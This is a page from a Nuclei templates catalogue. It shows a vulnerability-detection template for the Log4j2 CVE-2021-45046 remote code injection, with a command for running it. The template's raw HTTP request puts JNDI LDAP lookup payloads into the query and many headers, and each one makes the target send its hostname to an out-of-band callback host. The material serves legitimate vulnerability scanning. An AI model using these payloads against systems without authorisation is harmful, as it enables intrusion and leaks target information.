Skip to content
Nuclei Templates

Apache Log4j2 - Remote Code Injection

ID: CVE-2021-45046

Severity: critical

Author: ImNightmaree

Tags: cve2021,cve,rce,oast,log4j,injection,kev,apache

Description

Section titled “Description”

Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.

YAML Source

Section titled “YAML Source”
id: CVE-2021-45046
info:
  name: Apache Log4j2 - Remote Code Injection
  author: ImNightmaree
  severity: critical
  description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or upgrade to a non-vulnerable version of Apache Log4j2.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
    - https://twitter.com/marcioalm/status/1471740771581652995
    - https://logging.apache.org/log4j/2.x/
    - http://www.openwall.com/lists/oss-security/2021/12/14/4
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9
    cve-id: CVE-2021-45046
    cwe-id: CWE-917
    epss-score: 0.97363
    epss-percentile: 0.99899
    cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: log4j
  tags: cve2021,cve,rce,oast,log4j,injection,kev,apache


http:
  - raw:
      - |
        GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1
        Host: {{Hostname}}
        Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}
        Accept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}
        Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}
        Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
        Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
        Authentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}
        Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}
        Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
        Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}
        Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}
        Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}
        Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
        User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}
        X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}
        X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}
        X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}
        X-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}
        X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
      - type: regex
        part: interactsh_request
        regex:
          - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output
    extractors:
      - type: kval
        kval:
      - type: regex
        group: 2
        regex:
          - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
      - type: regex
        group: 1
        regex:
          - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output
        part: interactsh_request
        # digest: 4a0a0047304502204a840a21336953401491afca41b378a09a1f91d1a9ddcc3730006d76b55739e1022100daab695f729353f232cefc195d1664d48a955e22a6c539731cf0eecf2718fdb9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502200843391800fc986c92d1d324e54c0106161426a98bb048d5743eb3a4e12ff347022100910f5e436e3c11c97acb69fdd5d60256844494ce123e8f35f4c2acd871b9b06d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-45046.yaml"

View on Github